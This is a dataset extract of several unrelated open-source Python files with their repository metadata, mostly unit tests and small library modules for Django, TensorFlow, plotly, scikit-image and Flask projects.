text (string, lengths 4 to 1.02M) | meta (dict)
---|---
from agithub.base import VERSION, STR_VERSION
__all__ = ["VERSION", "STR_VERSION"]
| {
"content_hash": "6f82c3b076ecf253718e4d5c88c281db",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 45,
"avg_line_length": 28,
"alnum_prop": 0.6904761904761905,
"repo_name": "mozilla/agithub",
"id": "e47e18b0e11b798d0e3284c2b66cee8bbd301b56",
"size": "172",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "agithub/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34949"
}
],
"symlink_target": ""
} |
import re
from django.core.exceptions import ObjectDoesNotExist
from django.template import Library, Node, Variable
from django.utils.safestring import mark_safe
from django.core.urlresolvers import reverse
from wakawaka.models import WikiPage
from wakawaka.urls import WIKI_SLUG
register = Library()
WIKI_WORDS_REGEX = re.compile(r'\b%s\b' % WIKI_SLUG)
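# Note (descriptive, not from the original source): WIKI_SLUG is expected to
# contain a capturing group, since replace_wikiword() below relies on
# m.group(1) to recover the page slug.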
def replace_wikiwords(value, group=None):
def replace_wikiword(m):
slug = m.group(1)
try:
page = WikiPage.objects.get(slug=slug)
kwargs = {
'slug': slug,
}
if group:
url = group.content_bridge.reverse('wakawaka_page', group, kwargs=kwargs)
else:
url = reverse('wakawaka_page', kwargs=kwargs)
return r'<a href="%s">%s</a>' % (url, slug)
except ObjectDoesNotExist:
kwargs = {
'slug': slug,
}
if group:
url = group.content_bridge.reverse('wakawaka_edit', group, kwargs=kwargs)
else:
url = reverse('wakawaka_edit', kwargs=kwargs)
return r'<a class="doesnotexist" href="%s">%s</a>' % (url, slug)
return mark_safe(WIKI_WORDS_REGEX.sub(replace_wikiword, value))
@register.filter
def wikify(value):
"""Makes WikiWords"""
return replace_wikiwords(value)
class WikifyContentNode(Node):
def __init__(self, content_expr, group_var):
self.content_expr = content_expr
self.group_var = Variable(group_var)
def render(self, context):
content = self.content_expr.resolve(context)
group = self.group_var.resolve(context)
return replace_wikiwords(content, group)
@register.tag
def wikify_content(parser, token):
bits = token.split_contents()
try:
group_var = bits[2]
except IndexError:
group_var = None
return WikifyContentNode(parser.compile_filter(bits[1]), group_var)
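# A usage sketch (an assumption for illustration, not part of the original
# module): the filter can also be called directly from Python; the text and
# the group object (which must provide a content_bridge) are hypothetical.
#
#   html = wikify("See MyWikiPage for details.")
#   html = replace_wikiwords("See MyWikiPage for details.", group=some_group)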
| {
"content_hash": "45fc80eadf45bc69e85d13a63dbb4e88",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 89,
"avg_line_length": 31.741935483870968,
"alnum_prop": 0.6158536585365854,
"repo_name": "pythonchelle/pycon",
"id": "8685cb1056643b376cd93c39eb7fd8c391575ebc",
"size": "2099",
"binary": false,
"copies": "3",
"ref": "refs/heads/2012",
"path": "pycon_project/apps/wakawaka/templatetags/wakawaka_tags.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from contextlib import contextmanager
from random import random, randrange
import os
import subprocess
import sys
import time
import unittest
import urllib as url
# 3p
from mock import patch
from nose.plugins.attrib import attr
# project
# needed because of the subprocess calls
sys.path.append(os.getcwd())
from ddagent import Application
from util import Watchdog
class WatchdogKill(Exception):
"""
The watchdog attempted to kill the process.
"""
pass
@attr('unix')
@attr(requires='core_integration')
class TestWatchdog(unittest.TestCase):
"""
Test watchdog in various conditions
"""
JITTER_FACTOR = 2
@contextmanager
def set_time(self, time):
"""
Helper, a context manager to set the current time value.
"""
# Set the current time within `util` module
mock_time = patch("util.time.time")
mock_time.start().return_value = time
# Yield
yield
# Unset the time mock
mock_time.stop()
@patch.object(Watchdog, 'self_destruct', side_effect=WatchdogKill)
def test_watchdog_frenesy_detection(self, mock_restarted):
"""
Watchdog restarts the process on suspiciously high activity.
"""
# Limit the restart timeframe for test purposes
Watchdog._RESTART_TIMEFRAME = 1
# Create a watchdog with a low activity tolerance
process_watchdog = Watchdog(10, max_resets=3)
ping_watchdog = process_watchdog.reset
with self.set_time(1):
# Can be reset 3 times within the watchdog timeframe
for x in xrange(0, 3):
ping_watchdog()
# On the 4th attempt, the watchdog detects suspiciously high activity
self.assertRaises(WatchdogKill, ping_watchdog)
with self.set_time(3):
# Gets back to normal when the activity timeframe expires.
ping_watchdog()
def test_watchdog(self):
"""
Verify that the watchdog kills the process even when it is spinning.
Verify that the watchdog kills the process when it is hanging.
"""
start = time.time()
try:
subprocess.check_call(["python", __file__, "busy"], stderr=subprocess.STDOUT)
raise Exception("Should have died with an error")
except subprocess.CalledProcessError:
duration = int(time.time() - start)
self.assertTrue(duration < self.JITTER_FACTOR * 5)
# Start pseudo web server
subprocess.Popen(["nc", "-l", "31834"])
start = time.time()
try:
subprocess.check_call(["python", __file__, "net"])
raise Exception("Should have died with an error")
except subprocess.CalledProcessError:
duration = int(time.time() - start)
self.assertTrue(duration < self.JITTER_FACTOR * 5)
# Normal loop, should run 5 times
start = time.time()
try:
subprocess.check_call(["python", __file__, "normal"])
duration = int(time.time() - start)
self.assertTrue(duration < self.JITTER_FACTOR * 5)
except subprocess.CalledProcessError:
self.fail("Watchdog killed normal process after %s seconds" % int(time.time() - start))
# Fast tornado, not killed
start = time.time()
p = subprocess.Popen(["python", __file__, "fast"])
p.wait()
duration = int(time.time() - start)
# should die as soon as flush_trs has been called
self.assertTrue(duration < self.JITTER_FACTOR * 10)
# Slow tornado, killed by the Watchdog
start = time.time()
p = subprocess.Popen(["python", __file__, "slow"])
p.wait()
duration = int(time.time() - start)
self.assertTrue(duration < self.JITTER_FACTOR * 4)
class MockTxManager(object):
def flush(self):
"Pretend to flush for a long time"
time.sleep(5)
sys.exit(0)
class MemoryHogTxManager(object):
def __init__(self, watchdog):
self._watchdog = watchdog
def flush(self):
rand_data = []
while True:
rand_data.append('%030x' % randrange(256**15))
self._watchdog.reset()
class PseudoAgent(object):
"""Same logic as the agent, simplified"""
AGENT_CONFIG = {
"bind_host": "localhost",
'endpoints': {
'https://app.datadoghq.com': ['api_key']
},
'forwarder_timeout': 5
}
def busy_run(self):
w = Watchdog(5)
w.reset()
while True:
random()
def hanging_net(self):
w = Watchdog(5)
w.reset()
x = url.urlopen("http://localhost:31834")
print "ERROR Net call returned", x
return True
def normal_run(self):
w = Watchdog(2)
w.reset()
for i in range(5):
time.sleep(1)
w.reset()
def slow_tornado(self):
a = Application(12345, self.AGENT_CONFIG)
a._watchdog = Watchdog(4)
a._tr_manager = MockTxManager()
a.run()
def fast_tornado(self):
a = Application(12345, self.AGENT_CONFIG)
a._watchdog = Watchdog(6)
a._tr_manager = MockTxManager()
a.run()
if __name__ == "__main__":
if sys.argv[1] == "busy":
a = PseudoAgent()
a.busy_run()
elif sys.argv[1] == "net":
a = PseudoAgent()
a.hanging_net()
elif sys.argv[1] == "normal":
a = PseudoAgent()
a.normal_run()
elif sys.argv[1] == "slow":
a = PseudoAgent()
a.slow_tornado()
elif sys.argv[1] == "fast":
a = PseudoAgent()
a.fast_tornado()
elif sys.argv[1] == "test":
t = TestWatchdog()
t.runTest()
elif sys.argv[1] == "memory":
a = PseudoAgent()
a.use_lots_of_memory()
| {
"content_hash": "c26a03e99ee3cd933bbe5b84052a358f",
"timestamp": "",
"source": "github",
"line_count": 205,
"max_line_length": 99,
"avg_line_length": 28.58048780487805,
"alnum_prop": 0.5777436422597713,
"repo_name": "cberry777/dd-agent",
"id": "c42a0ab46dbf1f388233eae0ffa1a54daee7888a",
"size": "5868",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "tests/core/test_watchdog.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "2753"
},
{
"name": "Go",
"bytes": "2389"
},
{
"name": "HTML",
"bytes": "8536"
},
{
"name": "Nginx",
"bytes": "3908"
},
{
"name": "PowerShell",
"bytes": "2665"
},
{
"name": "Python",
"bytes": "2510442"
},
{
"name": "Ruby",
"bytes": "87522"
},
{
"name": "Shell",
"bytes": "77317"
},
{
"name": "XSLT",
"bytes": "2222"
}
],
"symlink_target": ""
} |
r"""Tests for detection_inference.py."""
import os
import StringIO
import numpy as np
from PIL import Image
import tensorflow as tf
from object_detection.core import standard_fields
from object_detection.inference import detection_inference
from object_detection.utils import dataset_util
def get_mock_tfrecord_path():
return os.path.join(tf.test.get_temp_dir(), 'mock.tfrec')
def create_mock_tfrecord():
pil_image = Image.fromarray(np.array([[[123, 0, 0]]], dtype=np.uint8), 'RGB')
image_output_stream = StringIO.StringIO()
pil_image.save(image_output_stream, format='png')
encoded_image = image_output_stream.getvalue()
feature_map = {
'test_field':
dataset_util.float_list_feature([1, 2, 3, 4]),
standard_fields.TfExampleFields.image_encoded:
dataset_util.bytes_feature(encoded_image),
}
tf_example = tf.train.Example(features=tf.train.Features(feature=feature_map))
with tf.python_io.TFRecordWriter(get_mock_tfrecord_path()) as writer:
writer.write(tf_example.SerializeToString())
def get_mock_graph_path():
return os.path.join(tf.test.get_temp_dir(), 'mock_graph.pb')
def create_mock_graph():
g = tf.Graph()
with g.as_default():
in_image_tensor = tf.placeholder(
tf.uint8, shape=[1, None, None, 3], name='image_tensor')
tf.constant([2.0], name='num_detections')
tf.constant(
[[[0, 0.8, 0.7, 1], [0.1, 0.2, 0.8, 0.9], [0.2, 0.3, 0.4, 0.5]]],
name='detection_boxes')
tf.constant([[0.1, 0.2, 0.3]], name='detection_scores')
tf.identity(
tf.constant([[1.0, 2.0, 3.0]]) *
tf.reduce_sum(tf.cast(in_image_tensor, dtype=tf.float32)),
name='detection_classes')
graph_def = g.as_graph_def()
with tf.gfile.Open(get_mock_graph_path(), 'w') as fl:
fl.write(graph_def.SerializeToString())
class InferDetectionsTests(tf.test.TestCase):
def test_simple(self):
create_mock_graph()
create_mock_tfrecord()
serialized_example_tensor, image_tensor = detection_inference.build_input(
[get_mock_tfrecord_path()])
self.assertAllEqual(image_tensor.get_shape().as_list(), [1, None, None, 3])
(detected_boxes_tensor, detected_scores_tensor,
detected_labels_tensor) = detection_inference.build_inference_graph(
image_tensor, get_mock_graph_path())
with self.test_session(use_gpu=False) as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
tf.train.start_queue_runners()
tf_example = detection_inference.infer_detections_and_add_to_example(
serialized_example_tensor, detected_boxes_tensor,
detected_scores_tensor, detected_labels_tensor, False)
self.assertProtoEquals(r"""
features {
feature {
key: "image/detection/bbox/ymin"
value { float_list { value: [0.0, 0.1] } } }
feature {
key: "image/detection/bbox/xmin"
value { float_list { value: [0.8, 0.2] } } }
feature {
key: "image/detection/bbox/ymax"
value { float_list { value: [0.7, 0.8] } } }
feature {
key: "image/detection/bbox/xmax"
value { float_list { value: [1.0, 0.9] } } }
feature {
key: "image/detection/label"
value { int64_list { value: [123, 246] } } }
feature {
key: "image/detection/score"
value { float_list { value: [0.1, 0.2] } } }
feature {
key: "image/encoded"
value { bytes_list { value:
"\211PNG\r\n\032\n\000\000\000\rIHDR\000\000\000\001\000\000"
"\000\001\010\002\000\000\000\220wS\336\000\000\000\022IDATx"
"\234b\250f`\000\000\000\000\377\377\003\000\001u\000|gO\242"
"\213\000\000\000\000IEND\256B`\202" } } }
feature {
key: "test_field"
value { float_list { value: [1.0, 2.0, 3.0, 4.0] } } } }
""", tf_example)
def test_discard_image(self):
create_mock_graph()
create_mock_tfrecord()
serialized_example_tensor, image_tensor = detection_inference.build_input(
[get_mock_tfrecord_path()])
(detected_boxes_tensor, detected_scores_tensor,
detected_labels_tensor) = detection_inference.build_inference_graph(
image_tensor, get_mock_graph_path())
with self.test_session(use_gpu=False) as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
tf.train.start_queue_runners()
tf_example = detection_inference.infer_detections_and_add_to_example(
serialized_example_tensor, detected_boxes_tensor,
detected_scores_tensor, detected_labels_tensor, True)
self.assertProtoEquals(r"""
features {
feature {
key: "image/detection/bbox/ymin"
value { float_list { value: [0.0, 0.1] } } }
feature {
key: "image/detection/bbox/xmin"
value { float_list { value: [0.8, 0.2] } } }
feature {
key: "image/detection/bbox/ymax"
value { float_list { value: [0.7, 0.8] } } }
feature {
key: "image/detection/bbox/xmax"
value { float_list { value: [1.0, 0.9] } } }
feature {
key: "image/detection/label"
value { int64_list { value: [123, 246] } } }
feature {
key: "image/detection/score"
value { float_list { value: [0.1, 0.2] } } }
feature {
key: "test_field"
value { float_list { value: [1.0, 2.0, 3.0, 4.0] } } } }
""", tf_example)
if __name__ == '__main__':
tf.test.main()
| {
"content_hash": "6bd2ebfba0ccd58c34c08c2cba23ccf7",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 80,
"avg_line_length": 35.388888888888886,
"alnum_prop": 0.5951508808651665,
"repo_name": "cshallue/models",
"id": "eabb6b474d672a48139cb4cdeebd388a4d5c4fca",
"size": "6422",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "research/object_detection/inference/detection_inference_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "1523636"
},
{
"name": "Dockerfile",
"bytes": "9821"
},
{
"name": "GLSL",
"bytes": "976"
},
{
"name": "HTML",
"bytes": "147010"
},
{
"name": "JavaScript",
"bytes": "33208"
},
{
"name": "Jupyter Notebook",
"bytes": "2829707"
},
{
"name": "Makefile",
"bytes": "4933"
},
{
"name": "Python",
"bytes": "13149300"
},
{
"name": "Shell",
"bytes": "146035"
}
],
"symlink_target": ""
} |
"""Fichier contenant la fonction route."""
from primaires.scripting.fonction import Fonction
from primaires.scripting.instruction import ErreurExecution
class ClasseFonction(Fonction):
"""Retourne la route entre deux salles, si trouvée."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.route, "Salle", "Salle")
@staticmethod
def route(origine, destination):
"""Retourne la liste des sorties reliant origine à destination.
Cette fonction utilise le complexe des routes créé. Les
deux salles (origine et destination) doivent donc être
présentes dans deux routes. Il doit de plus exister un
chemin identifié par le système (le système doit savoir
comment relier les deux routes en question). Si la route ne
peut pas être trouvée, pour X raison, une valeur nulle est
retournée et un message d'avertissement est enregistré dans
les logs, pour aider au débuggage. Sinon, retourne la
liste des sorties permettant de se rendre de origine à
destination.
Paramètres à préciser :
* origine : la salle d'origine
* destination : la salle de destination
Exemple d'utilisation :
# Récupère deux salles dans l'univers, si nécessaire
origine = salle("zone1:mnemonique1")
destination = salle("zone2:mnemonique2")
# Recherche la route entre 'origine' et 'destination'
sorties = route(origine, destination)
si sorties:
# La route a pu être trouvée
# ...
pour chaque direction dans sorties:
dire origine "On va vers ${direction}."
fait
finsi
"""
try:
route = importeur.route.trouver_chemin(origine, destination)
except ValueError as err:
importeur.scripting.logger.warning(str(err))
return None
else:
return route.sorties
| {
"content_hash": "dedc5509ab68a4b10c1692be7d53a93c",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 72,
"avg_line_length": 35.67857142857143,
"alnum_prop": 0.6356356356356356,
"repo_name": "vlegoff/tsunami",
"id": "70dda25d2986cfc3c1863df51e15bce3dfa0cc9b",
"size": "3588",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/secondaires/route/fonctions/route.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "7930908"
},
{
"name": "Ruby",
"bytes": "373"
}
],
"symlink_target": ""
} |
"""
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.core.cache import cache
from model_mommy import mommy
from fabric_bolt.projects import models
from fabric_bolt.web_hooks import models as hook_models
User = get_user_model()
class TestURLS(TestCase):
project_type = None
project = None
stage = None
configuration = None
task = None
deployment = None
def setUp(self):
password = 'mypassword'
self.user = User.objects.create_superuser(email='[email protected]', password=password)
# You'll need to log him in before you can send requests through the client
self.client.login(email=self.user.email, password=password)
self._create_project()
def _create_project(self):
# Bare bones project
project = models.Project()
project.name = 'TEST_PROJECT'
project.description = 'TEST_DESCRIPTION'
project.save()
project_hook = hook_models.Hook()
project_hook.url = 'http://example.com/project/hook/'
project_hook.project = project
project_hook.save()
self.project_hook = project_hook
self.project = project
def test_create_url(self):
c = self.client
result = c.get(reverse('hooks_hook_create'))
self.assertIn(result.status_code, [200, 302])
def test_hook_with_project_url(self):
c = self.client
result = c.get(reverse('hooks_hook_create_with_project', args=(self.project.pk,)))
self.assertIn(result.status_code, [200, 302])
def test_hook_view(self):
c = self.client
result = c.get(reverse('hooks_hook_view', args=(self.project_hook.pk,)))
self.assertIn(result.status_code, [200, 302])
def test_hook_update(self):
c = self.client
result = c.get(reverse('hooks_hook_update', args=(self.project_hook.pk,)))
self.assertIn(result.status_code, [200, 302])
def test_hook_delete(self):
c = self.client
result = c.get(reverse('hooks_hook_delete', args=(self.project_hook.pk,)))
self.assertIn(result.status_code, [200, 302])
def test_hook_reverse(self):
h = hook_models.Hook()
h.url = 'http://www.example.com'
self.assertEqual(reverse('index'), h.get_absolute_url())
def test_hook_reverse_with_project(self):
h = hook_models.Hook()
h.url = 'http://www.example.com'
h.project = self.project
self.assertEqual(reverse('projects_project_view', args=(self.project.pk,)), h.get_absolute_url())
def test_hook_objects_manager(self):
hooks = hook_models.Hook.objects.hooks(self.project)
self.assertEqual(self.project_hook, hooks[0])
| {
"content_hash": "6bced4f0dd8f6744a6cac487c960537f",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 105,
"avg_line_length": 30.11111111111111,
"alnum_prop": 0.6507883260650789,
"repo_name": "brajput24/fabric-bolt",
"id": "aceef8654be8a9f4046b81b31ddc5876568691af",
"size": "2981",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "fabric_bolt/web_hooks/tests/test_urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "779"
},
{
"name": "HTML",
"bytes": "60042"
},
{
"name": "JavaScript",
"bytes": "102422"
},
{
"name": "Python",
"bytes": "197798"
}
],
"symlink_target": ""
} |
from flask_wtf.form import Form
from wtforms.fields import TextAreaField, PasswordField
from wtforms.fields.html5 import EmailField
from wtforms.widgets.core import TextArea
from wtforms.validators import input_required
class CKEditorWidget(TextArea):
def __call__(self, field, **kwargs):
if kwargs.get('class'):
kwargs['class'] += ' ckeditor'
else:
kwargs.setdefault('class', 'ckeditor')
return super(CKEditorWidget, self).__call__(field, **kwargs)
class CKEditorField(TextAreaField):
widget = CKEditorWidget()
class LoginForm(Form):
email = EmailField(validators=[input_required()])
password = PasswordField(validators=[input_required()])
__all__ = ('LoginForm', 'CKEditorField')
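# A usage sketch (an assumption for illustration, not part of the original
# module): CKEditorField drops into a form like any other WTForms field;
# `PostForm` and `body` are hypothetical names.
#
#   class PostForm(Form):
#       body = CKEditorField(validators=[input_required()])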
| {
"content_hash": "46bb1d30f91565a7376e43db6cad4905",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 68,
"avg_line_length": 28.96153846153846,
"alnum_prop": 0.6985391766268261,
"repo_name": "ap13p/elearn",
"id": "cc9304a6705d05958e20d31bedfb1c22cae97ec8",
"size": "753",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/forms/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "4903"
},
{
"name": "HTML",
"bytes": "44617"
},
{
"name": "JavaScript",
"bytes": "446"
},
{
"name": "Python",
"bytes": "40188"
},
{
"name": "Shell",
"bytes": "63"
}
],
"symlink_target": ""
} |
class MonitorTimer:
def __init__(self, monitor, metric):
pass
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
class Monitor:
def __init__(self, settings):
pass
def put(self, metric, value, units):
pass
def count(self, metric):
pass
def time(self, metric):
return MonitorTimer(self, metric)
| {
"content_hash": "7ab7f8ce7c7bba25c4717462e14c00a3",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 44,
"avg_line_length": 14.375,
"alnum_prop": 0.6550724637681159,
"repo_name": "oskgeek/liftpass",
"id": "e9cde4e504b709f48df6612ce0d82ccb659be1da",
"size": "347",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/monitoring/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "14383"
},
{
"name": "CoffeeScript",
"bytes": "15139"
},
{
"name": "HTML",
"bytes": "85150"
},
{
"name": "JavaScript",
"bytes": "103804"
},
{
"name": "Python",
"bytes": "118678"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class FamilyValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(self, plotly_name="family", parent_name="pie.title.font", **kwargs):
super(FamilyValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "plot"),
no_blank=kwargs.pop("no_blank", True),
role=kwargs.pop("role", "style"),
strict=kwargs.pop("strict", True),
**kwargs
)
| {
"content_hash": "19ec38a66640a9e2f80e5a285408d1ed",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 85,
"avg_line_length": 39.666666666666664,
"alnum_prop": 0.5882352941176471,
"repo_name": "plotly/python-api",
"id": "8b658bcaf83a662a724ec51588f44eb568d39656",
"size": "595",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/pie/title/font/_family.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
import numpy as np
from numpy.testing import (assert_equal, assert_almost_equal,
assert_raises)
from skimage.transform._geometric import _stackcopy
from skimage.transform._geometric import GeometricTransform
from skimage.transform import (estimate_transform, matrix_transform,
EuclideanTransform, SimilarityTransform,
AffineTransform, ProjectiveTransform,
PolynomialTransform, PiecewiseAffineTransform)
from skimage._shared._warnings import expected_warnings
SRC = np.array([
[-12.3705, -10.5075],
[-10.7865, 15.4305],
[8.6985, 10.8675],
[11.4975, -9.5715],
[7.8435, 7.4835],
[-5.3325, 6.5025],
[6.7905, -6.3765],
[-6.1695, -0.8235],
])
DST = np.array([
[0, 0],
[0, 5800],
[4900, 5800],
[4900, 0],
[4479, 4580],
[1176, 3660],
[3754, 790],
[1024, 1931],
])
def test_stackcopy():
layers = 4
x = np.empty((3, 3, layers))
y = np.eye(3, 3)
_stackcopy(x, y)
for i in range(layers):
assert_almost_equal(x[..., i], y)
def test_estimate_transform():
for tform in ('euclidean', 'similarity', 'affine', 'projective',
'polynomial'):
estimate_transform(tform, SRC[:2, :], DST[:2, :])
assert_raises(ValueError, estimate_transform, 'foobar',
SRC[:2, :], DST[:2, :])
def test_matrix_transform():
tform = AffineTransform(scale=(0.1, 0.5), rotation=2)
assert_equal(tform(SRC), matrix_transform(SRC, tform.params))
def test_euclidean_estimation():
# exact solution
tform = estimate_transform('euclidean', SRC[:2, :], SRC[:2, :] + 10)
assert_almost_equal(tform(SRC[:2, :]), SRC[:2, :] + 10)
assert_almost_equal(tform.params[0, 0], tform.params[1, 1])
assert_almost_equal(tform.params[0, 1], - tform.params[1, 0])
# over-determined
tform2 = estimate_transform('euclidean', SRC, DST)
assert_almost_equal(tform2.inverse(tform2(SRC)), SRC)
assert_almost_equal(tform2.params[0, 0], tform2.params[1, 1])
assert_almost_equal(tform2.params[0, 1], - tform2.params[1, 0])
# via estimate method
tform3 = EuclideanTransform()
tform3.estimate(SRC, DST)
assert_almost_equal(tform3.params, tform2.params)
def test_euclidean_init():
# init with implicit parameters
rotation = 1
translation = (1, 1)
tform = EuclideanTransform(rotation=rotation, translation=translation)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
# init with transformation matrix
tform2 = EuclideanTransform(tform.params)
assert_almost_equal(tform2.rotation, rotation)
assert_almost_equal(tform2.translation, translation)
# test special case for scale if rotation=0
rotation = 0
translation = (1, 1)
tform = EuclideanTransform(rotation=rotation, translation=translation)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
# test special case for scale if rotation=90deg
rotation = np.pi / 2
translation = (1, 1)
tform = EuclideanTransform(rotation=rotation, translation=translation)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
def test_similarity_estimation():
# exact solution
tform = estimate_transform('similarity', SRC[:2, :], DST[:2, :])
assert_almost_equal(tform(SRC[:2, :]), DST[:2, :])
assert_almost_equal(tform.params[0, 0], tform.params[1, 1])
assert_almost_equal(tform.params[0, 1], - tform.params[1, 0])
# over-determined
tform2 = estimate_transform('similarity', SRC, DST)
assert_almost_equal(tform2.inverse(tform2(SRC)), SRC)
assert_almost_equal(tform2.params[0, 0], tform2.params[1, 1])
assert_almost_equal(tform2.params[0, 1], - tform2.params[1, 0])
# via estimate method
tform3 = SimilarityTransform()
tform3.estimate(SRC, DST)
assert_almost_equal(tform3.params, tform2.params)
def test_similarity_init():
# init with implicit parameters
scale = 0.1
rotation = 1
translation = (1, 1)
tform = SimilarityTransform(scale=scale, rotation=rotation,
translation=translation)
assert_almost_equal(tform.scale, scale)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
# init with transformation matrix
tform2 = SimilarityTransform(tform.params)
assert_almost_equal(tform2.scale, scale)
assert_almost_equal(tform2.rotation, rotation)
assert_almost_equal(tform2.translation, translation)
# test special case for scale if rotation=0
scale = 0.1
rotation = 0
translation = (1, 1)
tform = SimilarityTransform(scale=scale, rotation=rotation,
translation=translation)
assert_almost_equal(tform.scale, scale)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
# test special case for scale if rotation=90deg
scale = 0.1
rotation = np.pi / 2
translation = (1, 1)
tform = SimilarityTransform(scale=scale, rotation=rotation,
translation=translation)
assert_almost_equal(tform.scale, scale)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.translation, translation)
def test_affine_estimation():
# exact solution
tform = estimate_transform('affine', SRC[:3, :], DST[:3, :])
assert_almost_equal(tform(SRC[:3, :]), DST[:3, :])
# over-determined
tform2 = estimate_transform('affine', SRC, DST)
assert_almost_equal(tform2.inverse(tform2(SRC)), SRC)
# via estimate method
tform3 = AffineTransform()
tform3.estimate(SRC, DST)
assert_almost_equal(tform3.params, tform2.params)
def test_affine_init():
# init with implicit parameters
scale = (0.1, 0.13)
rotation = 1
shear = 0.1
translation = (1, 1)
tform = AffineTransform(scale=scale, rotation=rotation, shear=shear,
translation=translation)
assert_almost_equal(tform.scale, scale)
assert_almost_equal(tform.rotation, rotation)
assert_almost_equal(tform.shear, shear)
assert_almost_equal(tform.translation, translation)
# init with transformation matrix
tform2 = AffineTransform(tform.params)
assert_almost_equal(tform2.scale, scale)
assert_almost_equal(tform2.rotation, rotation)
assert_almost_equal(tform2.shear, shear)
assert_almost_equal(tform2.translation, translation)
def test_piecewise_affine():
tform = PiecewiseAffineTransform()
tform.estimate(SRC, DST)
# make sure each single affine transform is exactly estimated
assert_almost_equal(tform(SRC), DST)
assert_almost_equal(tform.inverse(DST), SRC)
def test_projective_estimation():
# exact solution
tform = estimate_transform('projective', SRC[:4, :], DST[:4, :])
assert_almost_equal(tform(SRC[:4, :]), DST[:4, :])
# over-determined
tform2 = estimate_transform('projective', SRC, DST)
assert_almost_equal(tform2.inverse(tform2(SRC)), SRC)
# via estimate method
tform3 = ProjectiveTransform()
tform3.estimate(SRC, DST)
assert_almost_equal(tform3.params, tform2.params)
def test_projective_init():
tform = estimate_transform('projective', SRC, DST)
# init with transformation matrix
tform2 = ProjectiveTransform(tform.params)
assert_almost_equal(tform2.params, tform.params)
def test_polynomial_estimation():
# over-determined
tform = estimate_transform('polynomial', SRC, DST, order=10)
assert_almost_equal(tform(SRC), DST, 6)
# via estimate method
tform2 = PolynomialTransform()
tform2.estimate(SRC, DST, order=10)
assert_almost_equal(tform2.params, tform.params)
def test_polynomial_init():
tform = estimate_transform('polynomial', SRC, DST, order=10)
# init with transformation parameters
tform2 = PolynomialTransform(tform.params)
assert_almost_equal(tform2.params, tform.params)
def test_polynomial_default_order():
tform = estimate_transform('polynomial', SRC, DST)
tform2 = estimate_transform('polynomial', SRC, DST, order=2)
assert_almost_equal(tform2.params, tform.params)
def test_polynomial_inverse():
assert_raises(Exception, PolynomialTransform().inverse, 0)
def test_union():
tform1 = SimilarityTransform(scale=0.1, rotation=0.3)
tform2 = SimilarityTransform(scale=0.1, rotation=0.9)
tform3 = SimilarityTransform(scale=0.1 ** 2, rotation=0.3 + 0.9)
tform = tform1 + tform2
assert_almost_equal(tform.params, tform3.params)
tform1 = AffineTransform(scale=(0.1, 0.1), rotation=0.3)
tform2 = SimilarityTransform(scale=0.1, rotation=0.9)
tform3 = SimilarityTransform(scale=0.1 ** 2, rotation=0.3 + 0.9)
tform = tform1 + tform2
assert_almost_equal(tform.params, tform3.params)
assert tform.__class__ == ProjectiveTransform
tform = AffineTransform(scale=(0.1, 0.1), rotation=0.3)
assert_almost_equal((tform + tform.inverse).params, np.eye(3))
def test_union_differing_types():
tform1 = SimilarityTransform()
tform2 = PolynomialTransform()
assert_raises(TypeError, tform1.__add__, tform2)
def test_geometric_tform():
tform = GeometricTransform()
assert_raises(NotImplementedError, tform, 0)
assert_raises(NotImplementedError, tform.inverse, 0)
assert_raises(NotImplementedError, tform.__add__, 0)
def test_invalid_input():
assert_raises(ValueError, ProjectiveTransform, np.zeros((2, 3)))
assert_raises(ValueError, AffineTransform, np.zeros((2, 3)))
